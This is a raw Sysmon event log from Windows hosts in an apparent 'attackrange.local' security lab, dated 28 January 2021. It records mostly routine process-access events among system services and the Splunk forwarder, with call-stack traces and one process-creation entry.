22:13:41.137{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362448Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:41.137{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362447Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:41.137{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362446Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:41.137{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362445Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:41.137{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-3714-6013-c203-000000001100}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362444Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:41.137{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3714-6013-c203-000000001100}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362443Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.997{8e433fbf-3714-6013-c203-000000001100}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362451Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:43.825{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000033011Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:49.866{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-26B3-6013-0100-00000000A401}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000362514Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362513Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362512Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-ad03-000000001100}3428C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+1e231|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362511Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362510Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+1e231|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362509Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362508Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362507Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-aa03-000000001100}4824C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+1e231|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362506Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0f00-000000001100}84C:\Windows\system32\fontdrvhost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362505Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-1000-000000001100}1028C:\Windows\system32\fontdrvhost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362504Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-1100-000000001100}1116C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362503Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1400-000000001100}1256C:\Windows\system32\dwm.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362502Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1600-000000001100}1356C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362501Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1700-000000001100}1396C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362500Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1800-000000001100}1404C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362499Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1900-000000001100}1412C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362498Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1a00-000000001100}1500C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362497Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1c00-000000001100}1524C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362496Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1d00-000000001100}1612C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362495Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 